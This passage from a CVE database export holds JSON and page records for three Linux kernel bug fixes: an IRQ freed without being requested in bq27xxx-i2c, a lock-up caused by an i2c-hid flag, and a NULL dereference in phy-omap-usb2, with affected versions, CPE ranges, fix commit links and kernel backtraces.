"providerMetadata": {
"dateUpdated": "2024-11-06T14:52:19.829Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
},
{
"providerMetadata": {
"dateUpdated": "2024-08-02T00:34:52.312Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/d4d813c0a14d6bf52d810a55db06a2e7e3d98eaa"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/7394abc8926adee6a817bab10797e0adc898af77"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/d7acc4a569f5f4513120c85ea2b9f04909b7490f"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/e601ae81910ce6a3797876e190a2d8ef6cf828bc"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/cefe18e9ec84f8fe3e198ccebb815cc996eb9797"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/fbca8bae1ba79d443a58781b45e92a73a24ac8f8"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/083686474e7c97b0f8b66df37fcb64e432e8b771"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/2df70149e73e79783bcbc7db4fa51ecef0e2022c"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00017.html"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00020.html"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"drivers/power/supply/bq27xxx_battery_i2c.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "d4d813c0a14d6bf52d810a55db06a2e7e3d98eaa",
"status": "affected",
"version": "76d2ed844def0cb8704d766924b07b2a918b3e30",
"versionType": "git"
},
{
"lessThan": "7394abc8926adee6a817bab10797e0adc898af77",
"status": "affected",
"version": "dafe9136be7b7fc30f1f3ca410c15b7cc65bee44",
"versionType": "git"
},
{
"lessThan": "d7acc4a569f5f4513120c85ea2b9f04909b7490f",
"status": "affected",
"version": "1da9a4b55a6688e3a30c16d0cf2e7c6a90a684fb",
"versionType": "git"
},
{
"lessThan": "e601ae81910ce6a3797876e190a2d8ef6cf828bc",
"status": "affected",
"version": "e01820a94aea99296e500f54b3f36a2985061045",
"versionType": "git"
},
{
"lessThan": "cefe18e9ec84f8fe3e198ccebb815cc996eb9797",
"status": "affected",
"version": "e65fee45687fa2109e03056a696dc7d68a151296",
"versionType": "git"
},
{
"lessThan": "fbca8bae1ba79d443a58781b45e92a73a24ac8f8",
"status": "affected",
"version": "444ff00734f3878cd54ddd1ed5e2e6dbea9326d5",
"versionType": "git"
},
{
"lessThan": "083686474e7c97b0f8b66df37fcb64e432e8b771",
"status": "affected",
"version": "444ff00734f3878cd54ddd1ed5e2e6dbea9326d5",
"versionType": "git"
},
{
"lessThan": "2df70149e73e79783bcbc7db4fa51ecef0e2022c",
"status": "affected",
"version": "444ff00734f3878cd54ddd1ed5e2e6dbea9326d5",
"versionType": "git"
},
{
"status": "affected",
"version": "ca4a2ddd2e69ca82ca5992d4c49649b2cbac3b74",
"versionType": "git"
},
{
"status": "affected",
"version": "28960625adaaf3fa3d83c8d3596661d2576d0a83",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"drivers/power/supply/bq27xxx_battery_i2c.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "6.4"
},
{
"lessThan": "6.4",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "4.19.*",
"status": "unaffected",
"version": "4.19.309",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.4.*",
"status": "unaffected",
"version": "5.4.271",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.212",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.151",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.81",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.21",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.7.*",
"status": "unaffected",
"version": "6.7.9",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.8",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "4.19.309",
"versionStartIncluding": "4.19.284",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.4.271",
"versionStartIncluding": "5.4.244",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.212",
"versionStartIncluding": "5.10.181",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.151",
"versionStartIncluding": "5.15.114",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.81",
"versionStartIncluding": "6.1.31",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.21",
"versionStartIncluding": "6.4",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.7.9",
"versionStartIncluding": "6.4",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.8",
"versionStartIncluding": "6.4",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionStartIncluding": "4.14.316",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionStartIncluding": "6.3.5",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\npower: supply: bq27xxx-i2c: Do not free non existing IRQ\n\nThe bq27xxx i2c-client may not have an IRQ, in which case\nclient-\u003eirq will be 0. bq27xxx_battery_i2c_probe() already has\nan if (client-\u003eirq) check wrapping the request_threaded_irq().\n\nBut bq27xxx_battery_i2c_remove() unconditionally calls\nfree_irq(client-\u003eirq) leading to:\n\n[ 190.310742] ------------[ cut here ]------------\n[ 190.310843] Trying to free already-free IRQ 0\n[ 190.310861] WARNING: CPU: 2 PID: 1304 at kernel/irq/manage.c:1893 free_irq+0x1b8/0x310\n\nFollowed by a backtrace when unbinding the driver. Add\nan if (client-\u003eirq) to bq27xxx_battery_i2c_remove() mirroring\nprobe() to fix this."
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T12:55:35.363Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/d4d813c0a14d6bf52d810a55db06a2e7e3d98eaa"
},
{
"url": "https://git.kernel.org/stable/c/7394abc8926adee6a817bab10797e0adc898af77"
},
{
"url": "https://git.kernel.org/stable/c/d7acc4a569f5f4513120c85ea2b9f04909b7490f"
},
{
"url": "https://git.kernel.org/stable/c/e601ae81910ce6a3797876e190a2d8ef6cf828bc"
},
{
"url": "https://git.kernel.org/stable/c/cefe18e9ec84f8fe3e198ccebb815cc996eb9797"
},
{
"url": "https://git.kernel.org/stable/c/fbca8bae1ba79d443a58781b45e92a73a24ac8f8"
},
{
"url": "https://git.kernel.org/stable/c/083686474e7c97b0f8b66df37fcb64e432e8b771"
},
{
"url": "https://git.kernel.org/stable/c/2df70149e73e79783bcbc7db4fa51ecef0e2022c"
}
],
"title": "power: supply: bq27xxx-i2c: Do not free non existing IRQ",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2024-27412",
"datePublished": "2024-05-17T11:50:50.323Z",
"dateReserved": "2024-02-25T13:47:42.682Z",
"dateUpdated": "2025-05-04T12:55:35.363Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2024-35997 (GCVE-0-2024-35997)
Vulnerability from cvelistv5
Published
2024-05-20 09:48
Modified
2025-05-04 09:10
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
HID: i2c-hid: remove I2C_HID_READ_PENDING flag to prevent lock-up
The flag I2C_HID_READ_PENDING is used to serialize I2C operations.
However, this is not necessary, because I2C core already has its own
locking for that.
More importantly, this flag can cause a lock-up: if the flag is set in
i2c_hid_xfer() and an interrupt happens, the interrupt handler
(i2c_hid_irq) will check this flag and return immediately without doing
anything, then the interrupt handler will be invoked again in an
infinite loop.
Since interrupt handler is an RT task, it takes over the CPU and the
flag-clearing task never gets scheduled, thus we have a lock-up.
Delete this unnecessary flag.
References
| URL | Tags | |||||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
||||||||||||||||||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
Version: 4a200c3b9a40242652b5734630bdd0bcf3aca75f Version: 4a200c3b9a40242652b5734630bdd0bcf3aca75f Version: 4a200c3b9a40242652b5734630bdd0bcf3aca75f Version: 4a200c3b9a40242652b5734630bdd0bcf3aca75f Version: 4a200c3b9a40242652b5734630bdd0bcf3aca75f Version: 4a200c3b9a40242652b5734630bdd0bcf3aca75f Version: 4a200c3b9a40242652b5734630bdd0bcf3aca75f Version: 4a200c3b9a40242652b5734630bdd0bcf3aca75f |
||
{
"containers": {
"adp": [
{
"affected": [
{
"cpes": [
"cpe:2.3:o:linux:linux_kernel:-:*:*:*:*:*:*:*"
],
"defaultStatus": "unknown",
"product": "linux_kernel",
"vendor": "linux",
"versions": [
{
"lessThan": "c448a9fd50f7",
"status": "affected",
"version": "4a200c3b9a40",
"versionType": "custom"
}
]
},
{
"cpes": [
"cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*"
],
"defaultStatus": "unknown",
"product": "linux_kernel",
"vendor": "linux",
"versions": [
{
"lessThan": "b65fb50e04a9",
"status": "affected",
"version": "4a200c3b9a40",
"versionType": "custom"
}
]
},
{
"cpes": [
"cpe:2.3:o:linux:linux_kernel:-:*:*:*:*:*:*:*"
],
"defaultStatus": "unknown",
"product": "linux_kernel",
"vendor": "linux",
"versions": [
{
"lessThan": "5095b93021b8",
"status": "affected",
"version": "4a200c3b9a40",
"versionType": "custom"
}
]
},
{
"cpes": [
"cpe:2.3:o:linux:linux_kernel:-:*:*:*:*:*:*:*"
],
"defaultStatus": "unknown",
"product": "linux_kernel",
"vendor": "linux",
"versions": [
{
"lessThan": "21bfca822cfc",
"status": "affected",
"version": "4a200c3b9a40",
"versionType": "custom"
}
]
},
{
"cpes": [
"cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*"
],
"defaultStatus": "unknown",
"product": "linux_kernel",
"vendor": "linux",
"versions": [
{
"lessThan": "29e94f295bad",
"status": "affected",
"version": "4a200c3b9a40",
"versionType": "custom"
}
]
},
{
"cpes": [
"cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*"
],
"defaultStatus": "unknown",
"product": "linux_kernel",
"vendor": "linux",
"versions": [
{
"lessThan": "418c5575d564",
"status": "affected",
"version": "4a200c3b9a40",
"versionType": "custom"
}
]
},
{
"cpes": [
"cpe:2.3:o:linux:linux_kernel:-:*:*:*:*:*:*:*"
],
"defaultStatus": "unknown",
"product": "linux_kernel",
"vendor": "linux",
"versions": [
{
"lessThanOrEqual": "9c0f59e47a90",
"status": "affected",
"version": "4a200c3b9a40",
"versionType": "custom"
}
]
},
{
"cpes": [
"cpe:2.3:o:linux:linux_kernel:-:*:*:*:*:*:*:*"
],
"defaultStatus": "unknown",
"product": "linux_kernel",
"vendor": "linux",
"versions": [
{
"status": "affected",
"version": "3.8"
}
]
},
{
"cpes": [
"cpe:2.3:o:linux:linux_kernel:-:*:*:*:*:*:*:*"
],
"defaultStatus": "unknown",
"product": "linux_kernel",
"vendor": "linux",
"versions": [
{
"lessThan": "3.8",
"status": "unaffected",
"version": "0",
"versionType": "custom"
}
]
},
{
"cpes": [
"cpe:2.3:o:linux:linux_kernel:-:*:*:*:*:*:*:*"
],
"defaultStatus": "unknown",
"product": "linux_kernel",
"vendor": "linux",
"versions": [
{
"lessThanOrEqual": "4.20",
"status": "unaffected",
"version": "4.19.313",
"versionType": "custom"
}
]
},
{
"cpes": [
"cpe:2.3:o:linux:linux_kernel:-:*:*:*:*:*:*:*"
],
"defaultStatus": "unknown",
"product": "linux_kernel",
"vendor": "linux",
"versions": [
{
"lessThanOrEqual": "5.5",
"status": "unaffected",
"version": "5.4.275",
"versionType": "custom"
}
]
},
{
"cpes": [
"cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*"
],
"defaultStatus": "unknown",
"product": "linux_kernel",
"vendor": "linux",
"versions": [
{
"lessThanOrEqual": "5.11",
"status": "unaffected",
"version": "5.10.216",
"versionType": "custom"
}
]
},
{
"cpes": [
"cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*"
],
"defaultStatus": "unknown",
"product": "linux_kernel",
"vendor": "linux",
"versions": [
{
"lessThanOrEqual": "5.16",
"status": "unaffected",
"version": "5.15.158",
"versionType": "custom"
}
]
},
{
"cpes": [
"cpe:2.3:o:linux:linux_kernel:-:*:*:*:*:*:*:*"
],
"defaultStatus": "unknown",
"product": "linux_kernel",
"vendor": "linux",
"versions": [
{
"lessThanOrEqual": "6.2",
"status": "unaffected",
"version": "6.1.90",
"versionType": "custom"
}
]
},
{
"cpes": [
"cpe:2.3:o:linux:linux_kernel:-:*:*:*:*:*:*:*"
],
"defaultStatus": "unknown",
"product": "linux_kernel",
"vendor": "linux",
"versions": [
{
"lessThanOrEqual": "6.7",
"status": "unaffected",
"version": "6.6.30",
"versionType": "custom"
}
]
},
{
"cpes": [
"cpe:2.3:o:linux:linux_kernel:-:*:*:*:*:*:*:*"
],
"defaultStatus": "unknown",
"product": "linux_kernel",
"vendor": "linux",
"versions": [
{
"lessThanOrEqual": "6.9",
"status": "unaffected",
"version": "6.8.9",
"versionType": "custom"
}
]
},
{
"cpes": [
"cpe:2.3:o:linux:linux_kernel:-:*:*:*:*:*:*:*"
],
"defaultStatus": "unknown",
"product": "linux_kernel",
"vendor": "linux",
"versions": [
{
"status": "unaffected",
"version": "6.9"
}
]
},
{
"cpes": [
"cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*"
],
"defaultStatus": "unknown",
"product": "linux_kernel",
"vendor": "linux",
"versions": [
{
"lessThan": "0561b65fbd53",
"status": "affected",
"version": "0",
"versionType": "custom"
}
]
}
],
"metrics": [
{
"other": {
"content": {
"id": "CVE-2024-35997",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2025-01-16T21:06:56.094266Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2025-01-16T21:08:33.482Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
},
{
"providerMetadata": {
"dateUpdated": "2024-08-02T03:30:12.481Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/21bfca822cfc1e71796124e93b46e0d9fa584401"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/c448a9fd50f77e8fb9156ff64848aa4295eb3003"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/5095b93021b899f54c9355bebf36d78854c33a22"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/b65fb50e04a95eec34a9d1bc138454a98a5578d8"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/0561b65fbd53d3e788c5b0222d9112ca016fd6a1"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/29e94f295bad5be59cf4271a93e22cdcf5536722"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/418c5575d56410c6e186ab727bf32ae32447d497"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/9c0f59e47a90c54d0153f8ddc0f80d7a36207d0e"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00017.html"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00020.html"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"drivers/hid/i2c-hid/i2c-hid-core.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "21bfca822cfc1e71796124e93b46e0d9fa584401",
"status": "affected",
"version": "4a200c3b9a40242652b5734630bdd0bcf3aca75f",
"versionType": "git"
},
{
"lessThan": "c448a9fd50f77e8fb9156ff64848aa4295eb3003",
"status": "affected",
"version": "4a200c3b9a40242652b5734630bdd0bcf3aca75f",
"versionType": "git"
},
{
"lessThan": "5095b93021b899f54c9355bebf36d78854c33a22",
"status": "affected",
"version": "4a200c3b9a40242652b5734630bdd0bcf3aca75f",
"versionType": "git"
},
{
"lessThan": "b65fb50e04a95eec34a9d1bc138454a98a5578d8",
"status": "affected",
"version": "4a200c3b9a40242652b5734630bdd0bcf3aca75f",
"versionType": "git"
},
{
"lessThan": "0561b65fbd53d3e788c5b0222d9112ca016fd6a1",
"status": "affected",
"version": "4a200c3b9a40242652b5734630bdd0bcf3aca75f",
"versionType": "git"
},
{
"lessThan": "29e94f295bad5be59cf4271a93e22cdcf5536722",
"status": "affected",
"version": "4a200c3b9a40242652b5734630bdd0bcf3aca75f",
"versionType": "git"
},
{
"lessThan": "418c5575d56410c6e186ab727bf32ae32447d497",
"status": "affected",
"version": "4a200c3b9a40242652b5734630bdd0bcf3aca75f",
"versionType": "git"
},
{
"lessThan": "9c0f59e47a90c54d0153f8ddc0f80d7a36207d0e",
"status": "affected",
"version": "4a200c3b9a40242652b5734630bdd0bcf3aca75f",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"drivers/hid/i2c-hid/i2c-hid-core.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "3.8"
},
{
"lessThan": "3.8",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "4.19.*",
"status": "unaffected",
"version": "4.19.313",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.4.*",
"status": "unaffected",
"version": "5.4.275",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.216",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.158",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.90",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.30",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.8.*",
"status": "unaffected",
"version": "6.8.9",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.9",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "4.19.313",
"versionStartIncluding": "3.8",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.4.275",
"versionStartIncluding": "3.8",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.216",
"versionStartIncluding": "3.8",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.158",
"versionStartIncluding": "3.8",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.90",
"versionStartIncluding": "3.8",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.30",
"versionStartIncluding": "3.8",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.8.9",
"versionStartIncluding": "3.8",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.9",
"versionStartIncluding": "3.8",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nHID: i2c-hid: remove I2C_HID_READ_PENDING flag to prevent lock-up\n\nThe flag I2C_HID_READ_PENDING is used to serialize I2C operations.\nHowever, this is not necessary, because I2C core already has its own\nlocking for that.\n\nMore importantly, this flag can cause a lock-up: if the flag is set in\ni2c_hid_xfer() and an interrupt happens, the interrupt handler\n(i2c_hid_irq) will check this flag and return immediately without doing\nanything, then the interrupt handler will be invoked again in an\ninfinite loop.\n\nSince interrupt handler is an RT task, it takes over the CPU and the\nflag-clearing task never gets scheduled, thus we have a lock-up.\n\nDelete this unnecessary flag."
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T09:10:11.851Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/21bfca822cfc1e71796124e93b46e0d9fa584401"
},
{
"url": "https://git.kernel.org/stable/c/c448a9fd50f77e8fb9156ff64848aa4295eb3003"
},
{
"url": "https://git.kernel.org/stable/c/5095b93021b899f54c9355bebf36d78854c33a22"
},
{
"url": "https://git.kernel.org/stable/c/b65fb50e04a95eec34a9d1bc138454a98a5578d8"
},
{
"url": "https://git.kernel.org/stable/c/0561b65fbd53d3e788c5b0222d9112ca016fd6a1"
},
{
"url": "https://git.kernel.org/stable/c/29e94f295bad5be59cf4271a93e22cdcf5536722"
},
{
"url": "https://git.kernel.org/stable/c/418c5575d56410c6e186ab727bf32ae32447d497"
},
{
"url": "https://git.kernel.org/stable/c/9c0f59e47a90c54d0153f8ddc0f80d7a36207d0e"
}
],
"title": "HID: i2c-hid: remove I2C_HID_READ_PENDING flag to prevent lock-up",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2024-35997",
"datePublished": "2024-05-20T09:48:00.363Z",
"dateReserved": "2024-05-17T13:50:33.148Z",
"dateUpdated": "2025-05-04T09:10:11.851Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2024-26600 (GCVE-0-2024-26600)
Vulnerability from cvelistv5
Published
2024-02-24 14:56
Modified
2025-05-04 08:51
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
phy: ti: phy-omap-usb2: Fix NULL pointer dereference for SRP
If the external phy working together with phy-omap-usb2 does not implement
send_srp(), we may still attempt to call it. This can happen on an idle
Ethernet gadget triggering a wakeup for example:
configfs-gadget.g1 gadget.0: ECM Suspend
configfs-gadget.g1 gadget.0: Port suspended. Triggering wakeup
...
Unable to handle kernel NULL pointer dereference at virtual address
00000000 when execute
...
PC is at 0x0
LR is at musb_gadget_wakeup+0x1d4/0x254 [musb_hdrc]
...
musb_gadget_wakeup [musb_hdrc] from usb_gadget_wakeup+0x1c/0x3c [udc_core]
usb_gadget_wakeup [udc_core] from eth_start_xmit+0x3b0/0x3d4 [u_ether]
eth_start_xmit [u_ether] from dev_hard_start_xmit+0x94/0x24c
dev_hard_start_xmit from sch_direct_xmit+0x104/0x2e4
sch_direct_xmit from __dev_queue_xmit+0x334/0xd88
__dev_queue_xmit from arp_solicit+0xf0/0x268
arp_solicit from neigh_probe+0x54/0x7c
neigh_probe from __neigh_event_send+0x22c/0x47c
__neigh_event_send from neigh_resolve_output+0x14c/0x1c0
neigh_resolve_output from ip_finish_output2+0x1c8/0x628
ip_finish_output2 from ip_send_skb+0x40/0xd8
ip_send_skb from udp_send_skb+0x124/0x340
udp_send_skb from udp_sendmsg+0x780/0x984
udp_sendmsg from __sys_sendto+0xd8/0x158
__sys_sendto from ret_fast_syscall+0x0/0x58
Let's fix the issue by checking for send_srp() and set_vbus() before
calling them. For USB peripheral only cases these both could be NULL.
References
| URL | Tags | |||||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
||||||||||||||||||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
Version: 657b306a7bdfca4ae1514b533a0e7c3c6d26dbc6 Version: 657b306a7bdfca4ae1514b533a0e7c3c6d26dbc6 Version: 657b306a7bdfca4ae1514b533a0e7c3c6d26dbc6 Version: 657b306a7bdfca4ae1514b533a0e7c3c6d26dbc6 Version: 657b306a7bdfca4ae1514b533a0e7c3c6d26dbc6 Version: 657b306a7bdfca4ae1514b533a0e7c3c6d26dbc6 Version: 657b306a7bdfca4ae1514b533a0e7c3c6d26dbc6 Version: 657b306a7bdfca4ae1514b533a0e7c3c6d26dbc6 |
||
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2024-26600",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-06-28T17:03:23.255963Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-06-28T17:03:34.995Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
},
{
"providerMetadata": {
"dateUpdated": "2024-08-02T00:07:19.673Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/486218c11e8d1c8f515a3bdd70d62203609d4b6b"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/8398d8d735ee93a04fb9e9f490e8cacd737e3bf5"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/be3b82e4871ba00e9b5d0ede92d396d579d7b3b3"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/8cc889b9dea0579726be9520fcc766077890b462"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/0430bfcd46657d9116a26cd377f112cbc40826a4"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/14ef61594a5a286ae0d493b8acbf9eac46fd04c4"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/396e17af6761b3cc9e6e4ca94b4de7f642bfece1"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/7104ba0f1958adb250319e68a15eff89ec4fd36d"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00017.html"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00020.html"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"drivers/phy/ti/phy-omap-usb2.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "486218c11e8d1c8f515a3bdd70d62203609d4b6b",
"status": "affected",
"version": "657b306a7bdfca4ae1514b533a0e7c3c6d26dbc6",
"versionType": "git"
},
{
"lessThan": "8398d8d735ee93a04fb9e9f490e8cacd737e3bf5",
"status": "affected",
"version": "657b306a7bdfca4ae1514b533a0e7c3c6d26dbc6",
"versionType": "git"
},
{
